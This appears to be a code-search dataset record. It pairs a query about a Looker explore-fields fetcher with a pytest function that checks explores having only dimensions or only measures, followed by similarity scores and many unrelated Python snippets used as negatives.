[ "0.6674417", "0.5879174", "0.573975", "0.5573522", "0.5512234", "0.5511594", "0.54789424", "0.5453956", "0.54249877", "0.5305752", "0.52119917", "0.5211895", "0.5186949", "0.5154393", "0.5097592", "0.50868165", "0.50696427", "0.4995546", "0.49941427", "0.49911252", "0.49783477", "0.49753472", "0.49482512", "0.4939018", "0.4932287", "0.4932287", "0.49266338", "0.49254662", "0.49111807", "0.49102694", "0.4890678", "0.48695132", "0.4862269", "0.4855858", "0.48490602", "0.48288843", "0.48205313", "0.48068416", "0.4767251", "0.47331738", "0.4725351", "0.4718402", "0.471802", "0.47144514", "0.46984056", "0.46968046", "0.46930245", "0.46928537", "0.46881914", "0.46831286", "0.46827945", "0.46824586", "0.46824336", "0.46812868", "0.4679676", "0.46789503", "0.46754426", "0.46698397", "0.4662698", "0.4661934", "0.46617106", "0.4655941", "0.46424165", "0.46360722", "0.46313873", "0.4629669", "0.46291634", "0.46271306", "0.46213883", "0.4620657", "0.4614988", "0.46145868", "0.46145305", "0.46053308", "0.45986938", "0.4598025", "0.45881686", "0.4580564", "0.45774087", "0.45761722", "0.4575263", "0.45712677", "0.4570383", "0.45662487", "0.45661294", "0.4563072", "0.45584482", "0.45551443", "0.455508", "0.45542282", "0.45512787", "0.45484075", "0.45412073", "0.453986", "0.45340055", "0.45303234", "0.45269573", "0.45262474", "0.4526122", "0.45223355" ]
0.7982038
0
fetcher.get_explore_fields() should return an explores fields.
def test_get_explore_fields_gets_fields( fc: fetcher.Fetcher, test_model, test_explores_stats ): test_explore = test_explores_stats[0] explore = fc.get_explores(model=test_model["name"], explore=test_explore["name"]) assert isinstance(explore, list) explore = explore[0] assert isinstance(explore, models.LookmlModelExplore) assert explore.model_name == test_model["name"] assert explore.name == test_explore["name"] fields = fc.get_explore_fields(explore) assert isinstance(fields, list) assert fields == test_explore["all_fields"]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def fields(self):\n ...", "def fields(request):\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response", "def fieldsUrl(self):\n return self.lweBaseUrl + \\\n \"/collections/\" + self.collectionName + \\\n \"/fields\"", "def get_query_fields(cls):\n ...", "def fields(self):", "def get_fields(self, pager=None):\n return Field.deserialize_list(self._get_multiple('fields', {}, pager))", "def listFields(self):\n return self.get_json('/field')", "def _get_fields(self):\n return self._fields", "def request_fields(self, fields=None):\n # The cursor only works for the 'search' endpoint, just call\n # the 'field' endpoint and return all the field types\n response = self.connection.get_request(self.uri_field)\n if response.status_code != requests.codes.ok:\n logger.warning('JIRA Cloud returned %d for %s', response.status_code, self.uri_field)\n return []\n content = json.loads(response.content)\n # Overwrite some fields\n for c in content:\n if c['name'] == 'Epic Status':\n c['schema']['type'] = 'string'\n c['choices'] = (('To Do', 'To Do'), ('In Progress', 'In Progress'), ('Done', 'Done'))\n elif c['name'] == 'Resolution':\n c['choices'] = self._get_resolutions()\n\n # The KEY field is never returned\n c = {\n \"id\": \"key\",\n \"key\": \"key\",\n \"name\": \"Key\",\n \"custom\": False,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"key\",\n ],\n \"schema\": {\n \"type\": \"string\",\n }\n }\n content.append(c)\n # The parent field is never returned\n c = {\n \"id\": \"parent\",\n \"key\": \"parent\",\n \"name\": \"Parent\",\n \"custom\": True,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"parent\",\n ],\n \"schema\": {\n \"type\": \"any\",\n \"custom\": \"com.django-atlassian:parent\"\n }\n }\n content.append(c)\n return content", "def get_fields(self):\r\n return self.fields", "def fields(self):\r\n pass", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def pull_fields(self, org):\n pass", "def Fields(self):\n return self._fields", "def read_fields(self, limit = 0, collapse = False):\r\n\r\n keys = []\r\n probes = {}\r\n\r\n def probe_record(record, parent = None):\r\n for key, value in record.items():\r\n full_key = parent + \".\" + key if parent else key\r\n\r\n if self.expand and type(value) == dict:\r\n probe_record(value, full_key)\r\n continue\r\n\r\n if not full_key in probes:\r\n probe = brewery.dq.FieldTypeProbe(full_key)\r\n probes[full_key] = probe\r\n keys.append(full_key)\r\n else:\r\n probe = probes[full_key]\r\n probe.probe(value)\r\n\r\n count = 0\r\n for record in self.records():\r\n if collapse:\r\n record = collapse_record(record)\r\n\r\n probe_record(record)\r\n if limit and count >= limit:\r\n break\r\n count += 1\r\n\r\n fields = []\r\n\r\n for key in keys:\r\n probe = probes[key]\r\n field = Field(probe.field)\r\n\r\n storage_type = probe.unique_storage_type\r\n if not storage_type:\r\n field.storage_type = \"unknown\"\r\n elif storage_type == \"unicode\":\r\n field.storage_type = \"string\"\r\n else:\r\n field.storage_type = \"unknown\"\r\n field.concrete_storage_type = storage_type\r\n\r\n # FIXME: Set analytical type\r\n\r\n fields.append(field)\r\n\r\n self.fields = list(fields)\r\n return self.fields", "def get_fields(self, path):\n with self.inspector(path) as opened_file:\n return opened_file.describe_fields()", "def get_fields(self, key=None):\n return self._get_query('fields', self._build_params(key=key), Field)", "def get_fields(self):\n return self.fields", "def get_fields(self):\n return self.fields", "def get_fields_list(self):\n return self.description[\"fields\"][\"values\"].keys()", "def test_get_featured_front_page_returns_required_fields(self):\r\n\r\n app = self.create_app(None)\r\n app.owner = self.user\r\n db.session.add(app)\r\n featured = Featured(app=app)\r\n db.session.add(featured)\r\n db.session.commit()\r\n fields = ('id', 'name', 'short_name', 'info', 'n_volunteers', 'n_completed_tasks')\r\n\r\n featured = cached_apps.get_featured_front_page()[0]\r\n\r\n for field in fields:\r\n assert featured.has_key(field), \"%s not in app info\" % field", "def _commercial_fields(self):\n return ['website']", "def _select_fields(self):\r\n return []", "def f(self):\r\n return self.fields()", "def readAccessedFields(self):\n pass", "def fields(request):\n # Only recognizes a few fields for now.\n if request.method != 'POST':\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response\n\n if not request.issue.edit_allowed:\n if not IS_DEV:\n return HttpTextResponse('Login required', status=401)\n fields = json.loads(request.POST.get('fields'))\n issue = request.issue\n if 'description' in fields:\n issue.description = fields['description']\n if 'reviewers' in fields:\n issue.reviewers = _get_emails_from_raw(fields['reviewers'])\n issue.calculate_updates_for()\n if 'subject' in fields:\n issue.subject = fields['subject']\n issue.put()\n return HttpTextResponse('')", "def QueryFields(self, what, fields=None, reason=None):\n query = []\n _AppendReason(query, reason)\n\n if fields is not None:\n _AppendIf(query, True, (\"fields\", \",\".join(fields)))\n\n return self._SendRequest(HTTP_GET,\n (\"/%s/query/%s/fields\" %\n (GANETI_RAPI_VERSION, what)), query, None)", "def test_max_features_paged(\n self, mp_wfs, mp_get_schema, mp_remote_describefeaturetype,\n mp_wfs_max_features, mp_remote_wfs_paged_feature):\n s = BoringSearch()\n df = s.search(return_fields=['pkey_boring'], max_features=15)\n assert len(df) == 15", "def get_fields(self):\n\n\t\treturn self.__fields", "def _get_fields(self):\n if not self._cursor.description:\n return {}\n\n results = {}\n column = 0\n\n for des in self._cursor.description:\n fieldname = des[0]\n results[column] = fieldname\n column = column + 1\n\n return results", "def test_query_api_result_fields():\n # Pick the first result and test for all fields\n result = query_api(url, \"test\")[0]\n assert all(field in result.keys() for field in fields)", "def get_fields(model, fields=None):\n include = [f.strip() for f in fields.split(',')] if fields else None\n return utils.get_fields(\n model,\n include\n )", "def _retrieve_fields(self, scope, fields):\r\n if scope == Scope.user_state:\r\n return self._chunked_query(\r\n StudentModule,\r\n 'module_state_key__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n course_id=self.course_id,\r\n student=self.user.pk,\r\n )\r\n elif scope == Scope.user_state_summary:\r\n return self._chunked_query(\r\n XModuleUserStateSummaryField,\r\n 'usage_id__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.preferences:\r\n return self._chunked_query(\r\n XModuleStudentPrefsField,\r\n 'module_type__in',\r\n set(descriptor.scope_ids.block_type for descriptor in self.descriptors),\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.user_info:\r\n return self._query(\r\n XModuleStudentInfoField,\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n else:\r\n return []", "def fields(self) -> List[Field]: # pragma: no cover\n pass", "def get_fields():\n if not request.is_xhr:\n abort(403)\n fields = Field.query.all()\n result = {field.id:field.name for field in fields}\n return jsonify(result)", "def get_fields(request):\n\n json_resp = {}\n json_resp['fields'] = []\n json_resp['fields_to_ann'] = []\n all = request.GET.get('all',None)\n workpath = os.path.dirname(os.path.abspath(__file__)) # Returns the Path your .py file is in\n auto_request = request.GET.get('ns_id', None)\n report = request.GET.get('report', None)\n # print(request.session['report_type'])\n if report is not None or all == 'all':\n if report is not None:\n if report.startswith('PUBMED_'):\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n json_resp = get_fields_from_json()\n if all == 'all':\n # All the possible fields for every usecase (MANUAL CONFIGURATION)\n json_resp = get_fields_from_json()\n if Report.objects.filter(institute = 'PUBMED').exists():\n json_resp['all_fields'].extend(['title','abstract','volume','journal','year','authors']) #aggiungo pubmed solo in coda!\n else:\n if request.session['report_type'] == 'pubmed':\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n # Fileds related exclusively to a usecase\n json_resp = get_fields_from_json_configuration(request.session['usecase'],request.session['institute'],request.session['language'])\n if request.session['mode'] == 'Robot' or auto_request == 'Robot':\n with open(os.path.join(workpath, './automatic_annotation/auto_fields/auto_fields.json')) as out:\n data = json.load(out)\n json_resp['fields_to_ann'] = data['extract_fields'][request.session['usecase']]\n for el in json_resp['fields_to_ann']:\n if el in json_resp['fields']:\n json_resp['fields'].remove(el)\n # print('FIELDS', json_resp)\n return JsonResponse(json_resp)", "def get_fields():\n return jsonify(result=Tree.fields())", "def test_max_features_first_page(\n self, mp_wfs, mp_get_schema, mp_remote_describefeaturetype,\n mp_wfs_max_features, mp_remote_wfs_paged_feature):\n s = BoringSearch()\n df = s.search(return_fields=['pkey_boring'], max_features=5)\n assert len(df) == 5", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def fields(self):\r\n return self._by_name.iteritems()", "def get_fields(self):\n return list(self.metadata.keys())", "def fields(self, forge, values):\n\n values[\"forge\"] = forge['id']\n\n fields = opengui.Fields(\n values=values,\n fields=FIELDS,\n ready=True\n )\n\n fields[\"forge\"].description = forge[\"description\"]\n\n if os.path.exists(\"/opt/service/forge/fields.yaml\"):\n with open(\"/opt/service/forge/fields.yaml\", \"r\") as fields_file:\n fields.extend(yaml.safe_load(fields_file).get(\"fields\", []))\n\n for field in forge.get(\"input\", {}).get(\"fields\", []):\n if field[\"name\"] in RESERVED:\n raise Exception(f\"field name '{field['name']}' is reserved\")\n self.field(fields, field)\n\n return fields", "def fields(self, _only_called=False, **kwargs):\n\n # Check for an operator and transform to mongo-style if there is one\n operators = [\"slice\"]\n cleaned_fields = []\n for key, value in kwargs.items():\n parts = key.split(\"__\")\n if parts[0] in operators:\n op = parts.pop(0)\n value = {\"$\" + op: value}\n\n key = \".\".join(parts)\n try:\n field_name, value = self._check_valid_field_name_to_project(key, value)\n except ValueError as e:\n raise e\n\n cleaned_fields.append((field_name, value))\n\n # divide fields on groups by their values\n # (ONLY group, EXCLUDE group etc.) and add them to _loaded_fields\n # as an appropriate QueryFieldList\n fields = sorted(cleaned_fields, key=operator.itemgetter(1))\n for value, group in itertools.groupby(fields, lambda x: x[1]):\n fields = [field for field, value in group]\n self._loaded_fields += QueryFieldList(fields, value=value, _only_called=_only_called)\n\n return self", "def extract(self):\n self.field_list = []\n \n try:\n self.mfields = self.getModel()._meta.fields\n if(self.mfields):\n try:\n for model_fields in self.mfields:\n if(model_fields.name == \"id\"):\n pass \n \n elif(model_fields.name == \"pci\"):\n pass \n elif(model_fields.name == \"sci\"):\n pass \n elif(model_fields.name == \"validated\"):\n pass \n else:\n self.field_list.append(model_fields.name)\n return self.field_list\n except:\n raise \n else:\n return None \n except:\n raise", "def fields(self):\r\n if not hasattr(self, '_fields'):\r\n self._fields = dict((clean_field_title(pc.title), pc.get_content())\r\n for pc in self.pagecontent_set.all())\r\n\r\n return self._fields", "def get_fieldlist(cls):\n return cls.fieldlist", "def objectFields(self):\n raise NotImplementedError", "def get_page_fields(self) -> list:\n project_page_fields = [\n 'project.name', 'project.short_description',\n 'project.created', 'project.changeset_comment',\n 'project.external_source.instructions',\n 'project.external_source.per_task_instructions',\n 'project.external_source.imagery',\n 'project.external_source.license',\n 'project.url', 'project.project_id', 'project.users'\n ]\n return project_page_fields", "def _all_fields_all_data():\n # Takes all name fields\n all_fields = PhotoTech.objects.all().values()[0].keys()\n # For all fileds takes all fields data \n all_data = [PhotoView._all_data_fields(x) for x in all_fields]\n allowed_search_fields = ['zoom',\n 'matrix_resol',\n 'color',\n 'matrix_size',\n 'country']\n # Return dict {keys: fields}\n return {x: y for x, y in zip(all_fields, all_data)\n if x in allowed_search_fields}", "def get_items(id_name, request, client):\n result = client.quick_search(request)\n \n items_pages = []\n limit_to_x_pages = None\n for page in result.iter(limit_to_x_pages):\n items_pages.append(page.get())\n\n items = [item for page in items_pages for item in page['features']]\n \n \n return (id_name, items)", "def test_fields(self):\n form = self._get_form(data=None)\n self.assertEquals(len(form.fields), 4)\n self.assertTrue('tests_url' in form.fields)\n self.assertTrue('repo_url' in form.fields)\n self.assertTrue('pkg_type' in form.fields)\n self.assertTrue('tags' in form.fields)", "def get_exp_meta(self, count=0):\n return {\n u\"limit\": 20,\n u\"next\": None,\n u\"offset\": 0,\n u\"previous\": None,\n u\"total_count\": count,\n }", "def test_all_features_paged(\n self, mp_wfs, mp_get_schema, mp_remote_describefeaturetype,\n mp_wfs_max_features, mp_remote_wfs_paged_feature):\n s = BoringSearch()\n df = s.search(query=PropertyIsGreaterThanOrEqualTo(\n 'diepte_tot_m', '0'), return_fields=['pkey_boring'])\n assert len(df) == 20", "def field_names(self):\n ...", "def explore_all_nf_data():\n request = app.current_request\n resource_type = request.query_params[\"resource_type\"]\n offset = int(request.query_params[\"offset\"])\n limit = int(request.query_params[\"limit\"])\n explorer = UnogsExplorer(resource_type)\n success = explorer.explore(limit, offset)\n return {\"success\": success}", "def get_fields(self):\n \n return self.metadata.keys()", "def test_Fieldform_has_fields(self):\n self.assertSequenceEqual(\n [\n \"date\",\n \"start_time\",\n \"end_time\",\n \"temperature\",\n \"humidity\",\n \"coordinator\",\n \"staff\",\n \"parcel_id\",\n ],\n list(self.Fieldform.fields),\n )", "def get_fields(self):\n\t\treturn self.__fields.copy()", "def test_get_hyperflex_feature_limit_internal_list(self):\n pass", "def fields(self):\n if self._fields is None:\n self._init_fields()\n return self._fields", "def get_host_data_fields(self):\n\n raise NotImplementedError", "def test_fetchSpecificHeaderFieldsWithoutHeaders(self):\n self.assertFetchSpecificFieldsWithEmptyList(\"HEADER.FIELDS\")", "def all_fields(item):\n return scom.all_fields(item)", "def get_fields(self, request, obj=None):\n if obj:\n return self.fields\n return self.add_fields", "def get_features(item, GP):\n contents_url = '%s/contents' % item['url']\n\n # scrape readme\n gf.get_readme_length(contents_url, GP)\n\n # scrape file-by-file stats\n digest_repo(contents_url, GP)\n\n # scrape commit history\n gf.get_repo_commit_history(item, GP)\n\n # scrape stargazers\n GP.n_stars = item['stargazers_count']\n\n # scrape forks\n GP.n_forks = item['forks_count']\n\n return GP", "def get_api_fields(cls):\n return ['fqdn', 'ttl', 'description', 'views']", "def get_readonly_fields(self, request, obj=None):\n if not self.all_fields_readonly or (request.user.is_superuser and self.superuser_skips_all_readonly):\n return self.readonly_fields\n print self.fieldsets\n print list(set(\n [field.name for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many]\n ))\n if self.fieldsets:\n return flatten_fieldsets(self.fieldsets)\n \n else:\n return list(set(\n [field.name for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many]\n ))", "def get_fields(node):\r\n return dict(iter_fields(node))", "def getData(self):\n import labstep.entities.experimentDataField.repository as experimentDataFieldRepository\n\n return experimentDataFieldRepository.getDataFields(self)", "def test_fields(self):\n form = self._get_form(data=None)\n self.assertEquals(len(form.fields), 5)\n self.assertTrue('pkg_type' in form.fields)\n self.assertTrue('name' in form.fields)\n self.assertTrue('tests_url' in form.fields)\n self.assertTrue('repo_url' in form.fields)\n self.assertTrue('tags' in form.fields)", "def get_fields(self, request, obj=None):\n if obj and obj.cwr:\n return (\n 'nwr_rev', 'description', 'works', 'filename', 'view_link',\n 'download_link')\n else:\n return ('nwr_rev', 'description', 'works')", "def GatherPageData(self, mr):\n # TODO(jrobbins): Allow deep-linking into this page.\n canned_query_views = []\n if mr.project_id:\n with mr.profiler.Phase('getting canned queries'):\n canned_queries = self.services.features.GetCannedQueriesByProjectID(\n mr.cnxn, mr.project_id)\n canned_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(canned_queries)]\n\n saved_query_views = []\n if mr.auth.user_id and self.services.features:\n with mr.profiler.Phase('getting saved queries'):\n saved_queries = self.services.features.GetSavedQueriesByUserID(\n mr.cnxn, mr.me_user_id)\n saved_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(saved_queries)\n if (mr.project_id in sq.executes_in_project_ids or\n not mr.project_id)]\n\n return {\n 'issue_tab_mode': 'issueAdvSearch',\n 'page_perms': self.MakePagePerms(mr, None, permissions.CREATE_ISSUE),\n 'canned_queries': canned_query_views,\n 'saved_queries': saved_query_views,\n }", "def get(self) -> list:\n return self.__expedition", "def get_returnable_fields(result, verbose=False):\n check_result(result)\n result_info = get_result(result)\n returnable_fields = result_info[\"returnable_fields\"]\n if verbose:\n pprint(returnable_fields)\n return returnable_fields", "def get(self):\n return parse_fields(raw=self._get())", "def extract_fields(self, json_dict):\n raise NotImplementedError()", "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def get_fields(self):\n \n fields = []\n for order in self.order_lst:\n fields += order.get_fields()\n \n fields = list(set(fields))\n \n out_fields = self.eod.sort_fields(fields)\n \n return out_fields", "def test_get_document_with_fields(index_with_documents):\n response = index_with_documents().get_document(\"500682\", {\"fields\": [\"id\", \"title\"]})\n assert isinstance(response, Document)\n assert hasattr(response, \"title\")\n assert not hasattr(response, \"poster\")\n # assert 'poster' not in response\n assert response.title == \"The Highwaymen\"", "def get_issues_data(org, query_limit):\n variables = {\n \"search_query\": f\"org:{org}\",\n \"size\": query_limit,\n }\n query = get_data_query('graphql/issues_data.gql')\n\n return get_data(query, variables)", "def getFieldNumbers():\n return _getCampaignDict()[\"field_numbers\"]", "def getFields(iface):\n return getFieldsInOrder(iface)", "def get_fields(self, resource):\n\n def _get_fields_key(resource):\n \"\"\"Returns the fields key from a resource dict\n\n \"\"\"\n if resource['code'] in [HTTP_OK, HTTP_ACCEPTED]:\n if (MODEL_RE.match(resource_id) or\n ANOMALY_RE.match(resource_id)):\n return resource['object']['model']['model_fields']\n elif CLUSTER_RE.match(resource_id):\n return resource['object']['clusters']['fields']\n elif CORRELATION_RE.match(resource_id):\n return resource['object']['correlations']['fields']\n elif STATISTICAL_TEST_RE.match(resource_id):\n return resource['object']['statistical_tests']['fields']\n elif STATISTICAL_TEST_RE.match(resource_id):\n return resource['object']['statistical_tests']['fields']\n elif LOGISTIC_REGRESSION_RE.match(resource_id):\n return resource['object']['logistic_regression']['fields']\n elif ASSOCIATION_RE.match(resource_id):\n return resource['object']['associations']['fields']\n elif SAMPLE_RE.match(resource_id):\n return dict([(field['id'], field) for field in\n resource['object']['sample']['fields']])\n else:\n return resource['object']['fields']\n return None\n\n if isinstance(resource, dict) and 'resource' in resource:\n resource_id = resource['resource']\n elif (isinstance(resource, basestring) and (\n SOURCE_RE.match(resource) or DATASET_RE.match(resource) or\n MODEL_RE.match(resource) or PREDICTION_RE.match(resource))):\n resource_id = resource\n resource = self._get(\"%s%s\" % (self.url, resource_id))\n else:\n LOGGER.error(\"Wrong resource id\")\n return\n # Tries to extract fields information from resource dict. If it fails,\n # a get remote call is used to retrieve the resource by id.\n fields = None\n try:\n fields = _get_fields_key(resource)\n except KeyError:\n resource = self._get(\"%s%s\" % (self.url, resource_id))\n fields = _get_fields_key(resource)\n\n return fields", "def get_fields_for_cr(cr_id):\n # Construct request\n url = \"{}/reports/{}/patient_fields\"\n url = url.format(FABRIC_API_URL, cr_id)\n\n sys.stdout.flush()\n result = requests.get(url, auth=auth)\n return result.json()", "def get_more_records(self):\n\n\t\treturn self.__more_records", "def _dataset_fields(geno):\n return {'title': geno['title'], 'notes': geno.get('notes', '')}", "def show_fields(self,\r\n ef_temp=None):\r\n\r\n returnstr = EMPTYCHAR\r\n temp_dict = {}\r\n returnset = set()\r\n for k_temp in self.default_dict['field']:\r\n k_temp = str(k_temp)\r\n\r\n if self.default_dict['field'][k_temp] in temp_dict:\r\n temp_dict[self.default_dict['field'][k_temp]].add(k_temp)\r\n else:\r\n temp_dict[self.default_dict['field'][k_temp]] = {k_temp}\r\n\r\n for k_temp in temp_dict:\r\n returnstr += (k_temp+' : '\r\n +str(rangelist.range_find([Index(a_temp)\r\n for a_temp\r\n in temp_dict[k_temp]],reduce=True)).replace(SLASH,LONGDASH)+EOL)\r\n if ef_temp is None:\r\n\r\n return returnstr\r\n\r\n for f_temp in ef_temp:\r\n returnset = returnset.union(temp_dict[f_temp])\r\n return returnset", "def get(self, field: str, value: str):\n data = {\n 'query': {\n 'object': 'EEXPENSES',\n 'select': {\n 'field': [\n 'RECORDNO',\n 'RECORDID',\n 'WHENCREATED',\n 'WHENPOSTED',\n 'TOTALENTERED',\n 'STATE',\n 'TOTALDUE',\n 'DESCRIPTION',\n 'CURRENCY',\n 'BASECURR',\n 'MEMO'\n ]\n },\n 'filter': {\n 'equalto': {\n 'field': field,\n 'value': value\n }\n },\n 'pagesize': '2000'\n }\n }\n\n return self.format_and_send_request(data)['data']", "def list_meta_fields():\n ret = {}\n status, result = _query(action=\"meta\", command=\"fields\")\n root = ET.fromstring(result)\n for field in root:\n field_id = None\n field_ret = {\"name\": field.text}\n for item in field.items():\n field_ret[item[0]] = item[1]\n if item[0] == \"id\":\n field_id = item[1]\n ret[field_id] = field_ret\n return ret", "def db_fields(self):", "def fields(self) -> Dict[str, Field]:\n return self._fields", "def test_fetchSpecificHeaderFieldsNotWithoutHeaders(self):\n self.assertFetchSpecificFieldsWithEmptyList(\"HEADER.FIELDS.NOT\")", "def get_details(self):", "def get_fields(cls):\n return cls.fields.values()", "def _all_data_fields(field):\n all_fields = PhotoTech.objects.all().values()\n return list(set([all_fields[x][field]\n for x in range(len(all_fields))]))" ]
[ "0.7630596", "0.71610755", "0.619276", "0.5935856", "0.5886932", "0.56719977", "0.56685346", "0.56128865", "0.5601622", "0.55978966", "0.55809444", "0.5578002", "0.55722994", "0.54728", "0.5469623", "0.5441008", "0.543378", "0.5390191", "0.5388459", "0.5369778", "0.5361909", "0.5316519", "0.5309478", "0.5309478", "0.52869046", "0.52429986", "0.52423596", "0.5213579", "0.520554", "0.5162964", "0.5138115", "0.51292866", "0.51155233", "0.50859845", "0.5067399", "0.50671124", "0.5064751", "0.5058002", "0.50471735", "0.50453645", "0.5039166", "0.5036336", "0.5036096", "0.5031893", "0.49971777", "0.49900404", "0.4972378", "0.49471077", "0.49432823", "0.4941458", "0.4938249", "0.4937504", "0.49254754", "0.49098217", "0.4903477", "0.489302", "0.48925886", "0.48903704", "0.48889676", "0.4887805", "0.4879936", "0.48657992", "0.48344672", "0.48259538", "0.48231593", "0.4811193", "0.48086205", "0.4806506", "0.48010623", "0.47978172", "0.47963983", "0.47954604", "0.47950658", "0.47898933", "0.47836366", "0.47835636", "0.4781751", "0.47784838", "0.4770445", "0.47679174", "0.4765149", "0.47608462", "0.47506836", "0.47445935", "0.47199368", "0.47191304", "0.47128955", "0.47101116", "0.47083703", "0.47033197", "0.4702533", "0.47002044", "0.46910805", "0.4676496", "0.46670267", "0.46658164", "0.46641374", "0.46597832", "0.4657733", "0.46574047" ]
0.8270363
0
fetcher.get_explore_fields() should return when an explore has only dimensions or only measures.
def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores( fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores ): expected = test_dimensions_or_measures_only_explores[0] explore = fc.get_explores(model=test_model["name"], explore=expected["name"]) assert isinstance(explore, list) actual = explore[0] assert actual.name == expected["name"] assert not (actual.fields.dimensions and actual.fields.measures) expected_fields = [f["name"] for f in expected["fields"]] actual_fields = fc.get_explore_fields(actual) assert actual_fields == expected_fields
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def fields(request):\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in 